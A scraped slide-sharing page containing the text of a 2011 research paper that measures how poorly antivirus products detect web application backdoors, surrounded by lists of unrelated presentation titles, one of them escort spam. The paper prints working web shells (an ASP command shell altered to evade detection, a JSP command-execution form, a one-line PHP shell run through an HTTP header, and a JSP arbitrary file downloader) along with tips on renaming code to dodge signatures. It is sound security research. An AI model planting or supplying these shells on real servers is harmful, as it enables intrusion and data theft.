Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Dernier

Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 

Dernier (20)

Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 

Effectiveness of AV in Detecting Web Application Backdoors

  • 1. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” WEB APPLICATION SECURITY instead take a look at the very common web application Backdoors that are Effectiveness of Antivirus in commonly used by hackers and how Antivirus being used widely on many Web Detecting Web Application Servers is incapable of detecting them. Backdoors [FB1H2S aka Rahul Sasi] http://fb1h2s.com http://garage4hackers.com Abstract: This paper gives detailed idea of Diagram - 001 the effectiveness of Antivirus software’s in Normally an attack goes like Diagram 001, detecting various Web Application where attacker finds vulnerability in a hosted backdoors that widely affect Web Servers. web application and he manages to upload a The analysis would prove the inefficiency of malicious application backdoors in one of the current Antivirus techniques in detecting servers supported languages, like Asp, Php, Web application backdoors and its Asp.net, Jsp etc. And this gives him control over consequences. the entire Web Server. Firewalls and Antivirus softwares are always part of a network. Firewalls are mostly not asked to monitor web Introduction: Considering the increased traffic. So the only security measure the Web servers depend upon is the Antivirus. And we number of attacks on Web Applications and will go in detail analyzing common web defacement statistics on Web Servers, it’s application backdoors and how AVs lack in high time to review the security of Web catching them. Servers and protection mechanism aided to prevent them. Zone-H report at http://www.zone-h.org/news/id/4735 says that the defacements count gets doubled every year. They also add that the methodologies used to gain access are still the same “Application Layer Vulnerabilities”. Let’s not go into application vulnerabilities but
  • 2. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Antivirus Detection Mechanisms and Test # 1.1 Where They Lack Objective: Test on an old and popular backdoor which proves that popularity matters for detection Signature Based Detection Backdoor / File name: C99.php In this technique the Antivirus softwares need Description: A very old and widely used to have the signature of the Backdoor, and for backdoor having. Great numbers of options are that the companies should already have had a available. Born some 12 years ago. Signatures copy of the backdoor for analyzing. are available with most of the Antivirus Reasons behind ineffectiveness of “Signature software’s. Based” detection of Web Backdoors Analysis: Shows that 81% AVs detect the old 1) Signature based detection works fine man with self propagating worms as there File name: c99_locus7s.php mass spreading mechanism will some way make it to reach the AV companies Submission date: 2010-12-27 08:06:42 too. But that’s not the case with web Result: 34 /42 (81.0%) backdoors they don’t have any self spreading mechanism and as they are Test # 1.2 only targeted on a particular server and thus the most common Backdoors Objective: Prove that Signature based detection signature remains unknown is very easy to bypass when it comes to detect a web application backdoors as it’s based on 2) The signatures are not built based on strings. instructions like in PEs, but instead using strings and function calls. Simply Description: Web backdoor’s built-in scripting renaming a function call, string or languages are easy to bypass, the signatures are changing the order of the program can not build based on instructions like in PEs, but prove to be enough to bypass instead using strings and function calls. Simply “Signature Based Detection” approach renaming a function call or changing the order of the program would be enough to bypass AV. Note: Below given are some samples analyzed A second test was done by simply removing the for example purpose. All the samples analyzed Change logs (Authors name and update logs) were downloaded form a collection of common from the top of the script and a reanalysis web backdoors archive found on internet few showed that now only 27 AV detected it years back, Virus Total was used for the analysis.
  • 3. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” File name: c99_locus7s.php File name: cmdasp.asp Submission date: 2011-01-25 12:17:19 Submission date: 2011-01-25 19:33:07 Result: 27 /43 (62.8%) Result: 35/ 43 (81.4%) Test #2.1 Test #3.2 Objective: Test on an old and not so popular Objective: Signature based detection on Web backdoor to prove that it’s really hard for web Application backdoors are easy to bypass application backdoors to reach AV vendor for Description: The above mentioned sample signature building which contained some HTML CODE (just for Description: Another sample was taken from formatting output) was edited in notepad and the same web backdoor collection pretty old the HTML contents were stripped off leaving but with less functionality, although enough to the actual backdoor code unhampered. Also deface a site functions were renamed and then backdoor was subjected to analysis Analysis: Shows that only 2 AV detects the backdoor. //html striped cmdasp.asp On Error Resume Next File name: AK-74 Security Team Web dim resp Shell Beta Version.php ' -- create the COM objects that we Submission date: 2011-01-25 17:33:25 will be using -- ' Result: 2/ 43 (4.7%) Set woot = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Test # 3.1 resp = woot.Run ("cmd.exe /c " dir, 0, True) Objective: Signature based detection of Web Response.Write Server.HTMLEncode(resp) Application backdoors are easy to bypass Description: A test on another old and popular Analysis: The analysis showed that striping of backdoor detected by all Av’s. And trying to useless plain HTML form the ASP code and make it undetectable by AVs. An Active Server renaming the function names made it Page’s simple command execute backdoor Undetectable by all the Avs while still providing named cmdasp.asp was obtained from a very full functionality old archive http://michaeldaw.org/projects/web-backdoor- File name: test2.asp compilation Submission date: 2011-01-25 19:57:03 Result: 0/ 43 (0.0%) Analysis: 81% of the AVs detected the script because of its popularity and availability of signature
  • 4. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Heuristics Based Detection For analyzing the above lets discuss on few common features of Web Application Not many Antivirus vendors depend upon backdoors. As such a Web backdoor would have heuristics for Web backdoor detection, only few some or all of the following features - prominent and leading Anti viruses employ this detection. 1) Execute System Commands On The Web Server Why heuristics based detection is not employed 2) Traverse Directories And View/Edit Files when it comes to Web Application And Programs 3) Upload Feature – Helpful In Local 1) Heuristics detection based on dynamic Privilege Escalation analysis and is always considered risky 4) Download Documents And File as the chances of false positives are 5) Registry Editing very high, and when it comes to Web 6) Execute A Reverse Connect, Bind Shell Application, risk is pretty high 7) Database Management 2) Web Application undergoes updates A Web backdoor with the first feature [Execute and changes frequently comparing PE commands] would itself be capable enough to files, and methodologies used for PE perform the rest of the features, in one way or detection could not be fully utilized other. So let’s further discuss on that. here Command execution is possible with almost all scripting languages if certain default functions 3) Executables could be added with a are not disabled on the environment depending legitimate sign in case of PEs but that’s upon the language. not possible with Web Scripts And except [1], [6] and [7] the rest all are 4) Static analysis on PE, based on few legitimate Web Application behaviors, so there critical and exceptional APIs could be is great possibility of getting detected. used for static heuristic detection. But Test # 4.1 in Web Application one flagging on such a function call would make a legitimate Objective: Testing simple command execution code black listed Backdoor in JSP, PHP using default system command execution functions and analyzing 5) Dynamic analysis at runtime is not used the efficiency of Antivirus in static heuristic on scripting languages as the codes are detection interpreted Command Execution shell in .Jsp that could be 6) Threat classification and Risk Analysis compiled to .war java web archive format. for Web Application is hard to automate
  • 5. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” // cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> Analysis: No Antivirus detected it File name: cmd.jsp Submission date: 2011-01-25 21:32:32 (UTC) Result: 0/ 43 (0.0%)
  • 6. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Test # 4.2 a runtime analysis is performed. And hence lack of detection is observed. Objective: Command Execution shell in PHP which could be added to an already existing Code: Download File from server PHP file and could process request via User- // Download_file.jsp by fb1h2s Agent header <%@ page import="java.util.*,java.io.*"%><% File f = new File <?php (request.getParameter("d")); passthru(getenv("HTTP_ACCEPT_LANGUAGE")) response.setContentType ("application/ear");response.setHeader ; echo '<br> Fb1h2s'; ?> ("Content-Disposition", "attachment; filename="fb1h2s.bak""); InputStream in = new Analysis: No Antivirus detected it FileInputStream(f);ServletOutputStream outs = response.getOutputStream();int bit = 2555555;int i = 0;while ((bit) >= File name: accept_lanaguage.php 0){bit = Submission date: 2011-01-25 21:36:20 in.read();outs.write(bit);}outs.flush() (UTC) ;outs.close();in.close();%> Result: 0/ 43 (0.0%) The above analysis shows that even though the getRuntime().exec and passthu() functions were Analysis: No antivirus scanners detected it present in the code the static analysis of the [Static and heuristics scan] in efficiency of AVs were not able to detect those critical detecting web backdoors at runtime. The above function calls. program is a threat, and these kinds of Threat classification and Risk Analysis for Web backdoors are hard to detect by automated Application is hard to automate. It’s hard to AVs, unless there is a policy created for files and detect which piece of code is legitimate and folders regarding accessibility which one is not. Consider the following tests File name: download_jsp.war Test #4.3 Submission date: 2011-01-26 3:36:20 Result: 0/ 43 (0.0%) Objective: Classifying a threat. Run time analysis is not possible on Web Backdoors Description: Below given is a simple program in JSP that could download files from the server. Downloading a file from web server is a legitimate activity and cannot be used as a reason for heuristic detection. But what if the program tries to download a configuration file, or other critical files from the server. These kinds of backdoors could not be detected unless
  • 7. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” d96e8606c79b0e76b6a2ce040395e775cb4da86- 1294670298 Conclusion: Web applications and environments hosting is growing rapidly and the necessity of providing improved security increases. The in efficiency of Test #3.2 current Antivirus software’s in detecting Web Application backdoors is proved to be http://www.virustotal.com/file- inadequate. These factors add up to need of scan/report.html?id=1b686ac4c7ffca2e546e3c82d0 b9012109f74d72f957615395b043923b83054e- Antivirus vendors become apprised of Web 1295374370 Back Door and improved specialized detection techniques. And also advises Web Server Test # 4.1 administrators not to fully depend on native http://www.virustotal.com/file- AV/Firewalls for preventing Web intrusions. scan/report.html?id=6c4ccd3589f1d64843e884382 There are a handful of good Web Applications b448f03d1277317524fa45e06d519b4b9ed5dc0- specific firewalls out in market, which could 1295991152 yield a satisfactory result. Test #4.2 References and Appendix: http://www.virustotal.com/file- Test # 1.1 scan/report.html?id=f1460fb9e543fb5d1ccc7eadad 05233a51fedb146c316017c31bf1856fd8f2a5- http://www.virustotal.com/file- 1295949577 scan/report.html?id=63d02e75b729e2cc17604235c f9c0b506b3ca5d578a8e32a0e85e28763ca25a6- Test #4.3 1293437202 http://www.virustotal.com/file- Test #1.2 scan/report.html?id=092e2e97b33119a97441c2419 4c49bf75d3cec7371c42fb1f94e2ecaeb78d8c9- http://www.virustotal.com/file- 1295936735 scan/report.html?id=07623faf67eae7706dbe43bf45 f383a1c19b6ab81dbc941ea7e47030412c7166- An archive of Codes and analyses could be 1295957839 found from here: Test #2.1 http://www.garage4hackers.com/showthread.p http://www.virustotal.com/file- hp?723-Effectiveness-of-Antivirus-in-Detecting- scan/report.html?id=dc91561fd0b7a555e9e1a26fd Web-Application-Backdoors d189d18832b9d896f50e7f8afa153773d1a851c- 1295976805 Test #3.1 http://www.virustotal.com/file- scan/report.html?id=101bf8dcdd414f09ba46cdecb
  • 8. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”